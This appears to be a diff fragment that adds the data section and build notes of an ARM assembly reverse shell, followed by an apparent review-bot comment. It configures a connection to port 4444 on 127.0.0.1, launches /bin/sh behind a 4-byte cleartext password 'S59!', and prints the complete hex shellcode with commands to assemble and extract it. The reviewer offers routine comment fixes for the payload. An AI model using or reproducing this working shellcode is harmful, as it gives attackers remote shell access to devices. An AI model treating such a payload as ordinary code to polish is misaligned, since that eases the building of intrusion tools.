+target:
+ // The 0xff will be replaced with a null on runtime
+ .ascii "\x02\xff" // Protocol: IPv4/TCP.
+
+ .ascii "\x11\x5c" // Port : 4444
+
+ // The '255' will be replaced with a 0 on runtime
+ .byte 127,255,255,1 // IP: 127.0.0.1.
+
+command: .ascii "/bin/sh?" // The '?' will be replaced with a null on runtime
+
+pass: .ascii "S59!"
+
+
+/*
+ Compile, link & extract:
+
+ as ARM-reverse-shell.s -o ARM-reverse-shell.o
+ ld -N ARM-reverse-shell.o -o ARM-reverse-shell
+ objcopy -O binary ARM-reverse-shell ARM-reverse-shell.dump
+ hexdump -v -e '"\\""x" 1/1 "%02x" ""' ARM-reverse-shell.dump
+
+ \x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\x20\x01\x21\x52\x40\xc8\x27\x51\x37\x01\xdf\x82\x46\x0e\xa1\x4a
+ \x70\x4a\x71\x8a\x71\x10\x22\x02\x37\x01\xdf\x02\xb4\x69\x46\x04\x22\x03\x27\x50\x46\x01\xdf\x0b\x4b
+ \x0c\x68\x63\x40\xf9\xd1\x02\x21\x3f\x27\x50\x46\x01\xdf\x01\x39\xfb\xd5\x04\xa0\x52\x40\x49\x40\xc2
+ \x71\x0b\x27\x01\xdf\x02\xff\x11\x5c\x7f\xff\xff\x01\x2f\x62\x69\x6e\x2f\x73\x68\x3f\x53\x35\x39\x21
+
+*/
\ No newline at end of file
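Review bot: The comment `// loop while r3 >= 0` on `bpl loop_stdio` names the wrong register: the counter decremented by `sub r1,#1` is r1, so it should read `// loop while r1 >= 0`. In `target`, `\x02\xff` is labelled `Protocol: IPv4/TCP`, but as the first two bytes of the structure passed to connect it is presumably the address-family field; `// sa_family: AF_INET (second byte patched to 0 at runtime)` would be more accurate. The header should also say that the "password" is a 4-byte cleartext comparison against the embedded `S59!`, so it is a gate and not authentication or encryption of the session.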